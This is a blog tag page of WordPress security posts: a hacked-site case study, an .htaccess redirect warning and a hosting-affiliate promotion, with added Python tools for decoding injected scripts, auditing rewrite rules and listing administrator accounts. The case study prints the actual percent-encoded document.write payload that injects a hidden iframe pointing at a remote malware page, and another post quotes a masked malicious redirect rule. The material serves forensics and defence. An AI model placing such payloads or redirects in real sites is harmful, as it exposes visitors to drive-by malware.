Posts Tagged ‘wordpress’

Follow-up on WordPress .htaccess Hack

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and on what was accessed during the time of the hack.

During my investigation I was told about another interesting development: another user of the same web hosting service was hacked in a similar way.

So at that point I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites, but that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I pored over the SQL database dump for over 48 hours (not consecutively) and compared WP files such as wp-config.php, and could not find anything except a strange base64-style code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in JPG files and uploaded JPG files to see whether they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research, and Sam’s help doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called I Love Social Bookmarking, and the affected file lived in: wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named ilsb.js.

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );

    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );

    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});

The offending code is the document.write line, the one containing all the percent signs (%). Those percent sequences are URL-encoded characters: unescape() decodes them back into an iframe tag whose width and height are both 0, and document.write() injects that tag into the page.

This code inserted an invisible iframe at the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing, and her site was beginning to be blocked by software that uses Google’s malware detection, which includes Firefox!
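To see what a percent-encoded document.write() payload of this shape actually injects, here is an added example (my own code, not from the post or from the plug-in) that scans JavaScript source for document.write(unescape('...')) calls, decodes the payload the way unescape() does, and reports whether the result is a zero-size iframe. The sample file contents and the malware.example domain are constructed for the demonstration, and the clean sample is a trimmed version of the normal ilsb.js shown above.

```python
"""Added example (not from the original post or the plug-in): find and decode
document.write(unescape('...')) payloads in JavaScript files, the pattern seen in
the hacked ilsb.js, and flag the ones that inject an invisible iframe.
All sample content below is constructed; malware.example is a placeholder domain."""
import re
from urllib.parse import unquote

# document.write(unescape('<payload>')), tolerant of the stray whitespace in the
# hacked file ("document .write") and of single or double quotes.
WRITE_UNESCAPE = re.compile(
    r"""document\s*\.\s*write\s*\(\s*unescape\s*\(\s*(['"])(?P<payload>[^'"]*)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]*)""")


def js_unescape(text: str) -> str:
    """Decode the way JavaScript's unescape() does: %uXXXX first, then %XX."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def is_hidden_iframe(html: str) -> bool:
    """True if the HTML contains an <iframe> whose width and height are both 0."""
    tag = IFRAME_TAG.search(html)
    if not tag:
        return False
    attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(0))}
    return attrs.get("width") == "0" and attrs.get("height") == "0"


def find_injected_writes(js_source: str) -> list[dict]:
    """One record per document.write(unescape(...)) call: the line it is on,
    the decoded payload, and whether that payload is an invisible iframe."""
    findings = []
    for m in WRITE_UNESCAPE.finditer(js_source):
        decoded = js_unescape(m.group("payload"))
        findings.append({
            "line": js_source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "hidden_iframe": is_hidden_iframe(decoded),
        })
    return findings


# --- constructed samples ---------------------------------------------------
CLEAN_JS = """// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function() { jQuery(".ilsb-child").show(); },
        function() { jQuery(".ilsb-child").hide(); }
    );
});
"""

# Same shape as the real injection: the whole iframe tag percent-encoded byte by byte.
INJECTED_HTML = ('<iframe src="http://malware.example/menu.php" '
                 'width="0" height="0" frameborder="0"></iframe>')
ENCODED = "".join("%%%02X" % ord(c) for c in INJECTED_HTML)
HACKED_JS = ("// JavaScript Document\ndocument .write(unescape('" + ENCODED + "'));\n"
             + CLEAN_JS[len("// JavaScript Document\n"):])

if __name__ == "__main__":
    for name, src in (("clean ilsb.js", CLEAN_JS), ("hacked ilsb.js", HACKED_JS)):
        hits = find_injected_writes(src)
        print(f"{name}: {len(hits)} document.write(unescape()) call(s)")
        for h in hits:
            print(f"  line {h['line']}: hidden iframe={h['hidden_iframe']}\n    {h['decoded']}")
```

Run it over every .js file under wp-content/plugins and wp-content/themes and diff the decoded payloads against what the plug-in legitimately ships; a zero-size iframe pointing at a host the plug-in has no business loading is the signature of this injection.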

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure your WP blog!

  1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it administrator privileges.
  2. Log out and log back in under the new name.
  3. Delete the admin account. WordPress will ask you if you’d like to assign its posts to another user; assign them to your new user name.
  4. Install the Bad Behavior plug-in and configure it properly.
  5. If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!
  6. Make sure you configure Akismet and get its API key.
  7. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet; suffice it to say that I believe spam comments with links may be key in this method.
  8. Make sure that all users – if you allow them to register – are configured to be subscribers only!
  9. If you suspect foul play of any sort, search for a hidden user. To do that:
  • Click on your Users section.
  • Click on the link to the Administrators page.
  • Right-click on the page and choose View Source.
  • Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should be only one name in that list; if you have 2, only two names, and so on.
  • If you find an extra one, you will have to delete that user from your SQL database.
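Step 9 checks the page source for administrators the Users screen does not show. The same check can be made directly against the database, which is where a hidden account has to live no matter how the admin pages are manipulated. The following is an added example (my own code, not from the post or from WordPress) that runs the administrator query over an in-memory SQLite copy of the two relevant tables, populated with constructed rows; the wp_ table prefix is the WordPress default and is assumed here, as is the serialized format WordPress uses for the capabilities value.

```python
"""Added example (not from the original post): query the WordPress database
directly for every account holding the administrator role, so an account hidden
from the Users screen still shows up. Runs against an in-memory SQLite copy of
wp_users/wp_usermeta with constructed rows; the 'wp_' table prefix is the
WordPress default and is assumed here."""
import sqlite3

SCHEMA = """
CREATE TABLE wp_users (
    ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (
    umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""

# Constructed rows. WordPress keeps roles as a PHP-serialized array in
# <prefix>usermeta under the meta_key <prefix>capabilities.
USERS = [
    (1, "debbie", "debbie@example.invalid", "2009-01-10 12:00:00"),
    (2, "guest_author", "guest@example.invalid", "2009-06-02 08:30:00"),
    (3, "wp_update", "noreply@example.invalid", "2009-11-28 03:14:07"),  # planted account
]
USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# The query a practitioner would paste into phpMyAdmin or the mysql client.
# {p} is the table prefix from wp-config.php, not user input, so formatting it
# into the statement is safe.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM {p}users AS u
JOIN {p}usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = '{p}capabilities'
  AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.ID
"""


def open_sample_db() -> sqlite3.Connection:
    """Build the in-memory sample database from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?, ?)", USERMETA)
    conn.commit()
    return conn


def list_administrators(conn: sqlite3.Connection, prefix: str = "wp_") -> list[tuple]:
    """Every (ID, login, email, registered) row whose capabilities include administrator."""
    return conn.execute(ADMIN_QUERY.format(p=prefix)).fetchall()


def unexpected_administrators(conn: sqlite3.Connection, known_logins, prefix: str = "wp_") -> list[str]:
    """Administrator logins that are not in the set of accounts you know you created."""
    known = set(known_logins)
    return [row[1] for row in list_administrators(conn, prefix) if row[1] not in known]


if __name__ == "__main__":
    db = open_sample_db()
    for row in list_administrators(db):
        print("administrator:", row)
    print("not on my list:", unexpected_administrators(db, {"debbie"}))
```

The registration timestamp is worth reading alongside the login: a planted administrator usually appears at an odd hour close to the date the defacement was noticed. On a live site, run the SELECT first and only then delete the offending rows from both tables.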

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read the vulnerability note NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow, located here: https://www.kb.cert.org/vuls/id/773545

And the note Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!


WP Blog Owners! Check Your .htaccess Files!

Here at MICE, we don’t publicly advertise our security clients because it’s an open invitation to hackers.

However, I do need to tell you that I was recently hired to look over a self-hosted WordPress blog that had been hacked.  I didn’t get to see the actual hacked message, but the client described it as a defacement of the main blog page saying, “You’ve been hacked.”

I am still trying to get a few minor details from the blog owner to determine how it was actually done, but the .htaccess file had been modified with a rewrite rule that applied to all the files on the blog.

As soon as I find out the remaining information, I will post more details including screen shots of the website that the file redirected to.

I am masking the actual redirect website with Xs in the offending line I found in the .htaccess file because I don’t want anyone going there, but if you see code like this, delete it and re-upload the file.

RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]

The R stands for Redirect and the L means Last, so Apache stops processing rewrite rules once this one matches. The .* pattern matches every request, so every page on the blog was sent to the redirect site.

You can open the .htaccess file in TextPad or Notepad by right-clicking it and choosing Open With.

More later, but this is your heads-up!
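A rule like the one above is easy to spot by eye in a short file, but .htaccess files on shared hosts grow long. Here is an added example (my own code, not from the post) that audits an .htaccess file for RewriteRule lines that redirect to an external site or that match every request without a preceding RewriteCond. The sample file is constructed from the standard WordPress rewrite block plus the masked malicious line quoted above.

```python
"""Added example (not from the original post): audit an .htaccess file for
RewriteRule lines that send visitors somewhere else, like the one found in the
hacked blog. The sample file below is constructed from the standard WordPress
block plus the masked malicious line quoted in the post."""
import re
from dataclasses import dataclass

RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE)
COND_RE = re.compile(r"^\s*RewriteCond\b", re.IGNORECASE)
# Patterns that match every request path.
CATCH_ALL = {".*", "^.*$", "^(.*)$", "(.*)", "^(.*)"}


@dataclass
class Finding:
    line_no: int
    text: str
    flags: list
    reasons: list


def parse_flags(flag_text):
    """'R=301,L' -> ['R', 'L']: keep the flag names, drop their arguments."""
    if not flag_text:
        return []
    return [f.strip().split("=", 1)[0].upper() for f in flag_text.split(",") if f.strip()]


def is_external(target: str) -> bool:
    """True for absolute http(s) or protocol-relative targets."""
    return re.match(r"^(https?:)?//", target, re.IGNORECASE) is not None


def audit_htaccess(text: str) -> list:
    """Return a Finding for every RewriteRule that redirects off-site or that
    catches every request unconditionally."""
    findings = []
    pending_conds = 0  # RewriteCond lines apply only to the next RewriteRule
    for line_no, line in enumerate(text.splitlines(), 1):
        if COND_RE.match(line):
            pending_conds += 1
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        pattern, target, flag_text = m.groups()
        flags = parse_flags(flag_text)
        reasons = []
        if is_external(target):
            reasons.append("target is an external URL")
            if "R" in flags:
                reasons.append("R flag makes it an HTTP redirect")
        if pattern in CATCH_ALL and pending_conds == 0:
            reasons.append("pattern matches every request and has no RewriteCond")
        if reasons:
            findings.append(Finding(line_no, line.strip(), flags, reasons))
        pending_conds = 0
    return findings


# Constructed sample: the stock WordPress block followed by the masked rule from the post.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]
"""

if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {f.line_no}: {f.text}")
        for r in f.reasons:
            print("   -", r)
```

The stock WordPress rules pass because their targets are local and the catch-all is guarded by the two RewriteCond lines; the injected rule trips all three checks. A legitimate HTTP-to-HTTPS redirect with an R flag will also be reported, which is the point: any off-site redirect in .htaccess should be one you put there yourself.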


Our Black Friday Weekend Special!

EXTENDED 1 MORE DAY BY REQUEST FOR CYBER MONDAY!

First, I’d like to share my Holiday greeting to you!

I hope you enjoyed my Holiday Greeting! That was done with JibJab in conjunction with Office Max, and I purchased it to share with you!

That being said, I have a special offer for this weekend only – today – Black Friday – November 27, 2009 through Sunday, November 29, 2009 Monday, November 30, 2009 at 11:59 PM. Although this is a blog post and remains in the archives, this offer will expire at midnight Sunday Monday! I will not be able to honor requests made after that time.

I will perform the following service FREE as long you use the link that follows this blog post to sign up for LunarPages web hosting service.

TIIM* Disclosure: This is my affiliate link and I earn $65 if you sign up using this link.  This compensates me partially for what I will do for you.

Here are the services that I will provide under this offer FREE:

  • Move an existing (see restrictions below) blog or website from your current web hosting account to your new LunarPages account. So if you’ve ever wanted to get on a secure and awesome web host now is your chance to make the move effortless!
  • Move an existing hosted blog (see restrictions below) from Blogger, Wordpress.com, or others, to your own self-hosted blog that I’ll set up for you on your new LunarPages account.  And no, you will not lose any of the blog posts you posted before.  This includes getting you set up with all the necessary plug-ins and widgets that you need to not only protect you but enable you to connect to your social networks.
  • Create a brand new WordPress blog for you on your new LunarPages web hosting account (see restrictions below).  And if you’re new to blogging, I will provide you support for up to 3 months to help you get started! This includes getting you set up with all the necessary plug-ins and widgets that you need to not only protect you but enable you to connect to your social networks.

Restrictions:

The website cannot have any scripts, auto-responders, or other software running like Joomla or Drupal. This move would require a lot of additional setup and potential complications that cannot be included in this offer.

If you are not sure what’s running on your website, use our Contact Page to contact me and give me the URL of your website in the message section and I’ll check it out and let you know if it’s doable. But the request must be made before midnight on Sunday, November 29, 2009 Monday, November 30, 2009!

If you are moving an entire blog from another host or a blogging site like Blogger, or WordPress, there cannot be more than 1,000 blog posts to move.

Your Part:

I will need access to your current host BEFORE you move the domain to the new name servers so I can get your website or blog downloaded for the move unless you already have a full back-up copy of the files yourself.

For blogs, I would like to do the back-up myself to ensure I can transfer them properly.  (I’ve done this before and my method works.  See: our Creative page or read the testimonial below.)

If you are new to this or unsure of any of what I’m saying, use our contact page to have me take a look at your site or blog BEFORE you sign up with LunarPages.  I will honor any outstanding inquiries made during this offer. But you must at least put in an inquiry! There is no cost for me to look at your site!

And of course, this comes with our guarantee that you will be satisfied!

Start the New Year with a secure, reliable web host!

Remember, all you pay for is the web hosting service when you sign up – which is also ridiculously inexpensive – I’ll do the move free (subject to the restrictions listed above).

And you just never know what might happen! You may discover what Michelle from Accurate Process discovered when we moved their site and did a redesign! They were suddenly listed in the search engines, getting traffic, AND that was before we even finished our magic! It just might happen to you!

So, if you do nothing else this weekend, at least submit an inquiry on our contact page to preserve this offer!

If you’re ready to make the move, click the image below – it contains our affiliate link so we get credit.


Lunarpages.com Web Hosting

Happy Holidays!

Debbie

Bad Behavior has blocked 553 access attempts in the last 7 days.